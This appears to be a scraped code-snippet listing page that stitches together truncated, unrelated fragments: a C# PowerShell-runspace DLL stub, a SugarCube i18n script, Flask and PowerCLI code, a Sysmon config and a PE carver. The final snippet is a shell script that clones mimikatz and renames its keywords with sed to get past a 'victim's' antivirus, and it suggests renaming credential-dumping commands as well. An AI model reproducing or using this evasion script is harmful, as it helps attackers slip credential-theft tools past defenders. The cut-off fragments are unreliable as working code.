CLICK ME
yes, even hidden code blocks!
print("hello world!")
using System; | |
using System.Text; | |
using System.Text.RegularExpressions; | |
using System.Management.Automation.Runspaces; | |
using System.Runtime.InteropServices; | |
using System.Net; | |
using RGiesecke.DllExport; | |
namespace Export | |
{ |
:: StoryTitle | |
SugarCube i18n example | |
:: Language Switching [script] | |
;(function () { | |
/*********************************************************** | |
Set up a `i18n` object on SugarCube's `setup` object. | |
***********************************************************/ | |
setup.i18n = { |
from flask import Flask, request, jsonify, json, abort | |
from flask_cors import CORS, cross_origin | |
import pandas as pd | |
app = Flask(__name__) | |
cors = CORS(app) | |
app.config['CORS_HEADERS'] = 'Content-Type' |
<Sysmon schemaversion="4.32"> | |
<!-- Capture all hashes --> | |
<HashAlgorithms>*</HashAlgorithms> | |
<DnsLookup>False</DnsLookup> | |
<ArchiveDirectory>Archive</ArchiveDirectory> | |
<EventFiltering> | |
<RuleGroup name="" groupRelation="or"> | |
<!-- Event ID 1 == Process Creation. Log all newly created processes except --> | |
<ProcessCreate onmatch="exclude"> | |
<Image condition="contains">splunk</Image> |
Function New-VMDeploy { | |
[CmdletBinding()] | |
Param() | |
DynamicParam { | |
# Set the dynamic parameters' name | |
$ParamName_portgroup = 'PortGroup' |
#!/usr/bin/env python2 | |
''' | |
Carve PE files from binary data. | |
Write them into the current directy named after their hash. | |
Example:: | |
$ python carvepe.py unallocated.bin | |
INFO:__main__:found pe at 0x0, length: 0xd8000 | |
INFO:__main__:writing pe file to 273ed32b617fd79ed1b88ebd4521a441.bin |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/windows | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
Table of Contents